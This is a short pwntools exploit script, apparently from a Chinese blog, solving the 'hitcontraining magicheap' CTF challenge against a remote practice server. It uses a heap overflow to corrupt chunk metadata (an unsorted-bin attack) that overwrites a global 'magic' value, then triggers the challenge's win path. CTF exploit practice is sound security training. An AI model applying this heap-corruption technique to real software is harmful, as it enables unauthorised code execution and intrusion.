from pwn import *
magic = 0x00000000006020A0
#p = process('./magicheap')
p = remote("node3.buuoj.cn",26020)
def CreateHeap(size,content):
p.sendlineafter('Your choice :','1')
p.sendlineafter('Size of Heap : ',str(size))
p.sendlineafter('Content of heap:',content)
def EditHeap(idx,size,content):
p.sendlineafter('Your choice :','2')
p.sendlineafter('Index :',str(idx))
p.sendlineafter('Size of Heap : ',str(size))
p.sendlineafter('Content of heap : ',content)
def DeleteHeap(idx):
p.sendlineafter('Your choice :','3')
p.sendlineafter('Index :',str(idx))
CreateHeap(0x30,'aaaa')
CreateHeap(0x80,'bbbb')
CreateHeap(0x10,'cccc')
DeleteHeap(1)
EditHeap(0,0x50,0x30 * "a" + p64(0)+p64(0x91)+p64(0)+p64(magic-10))
CreateHeap(0x80,'dddd')
p.sendlineafter(':','4869')
p.interactive()
hitcontraining magicheap
最新推荐文章于 2022-02-12 22:35:27 发布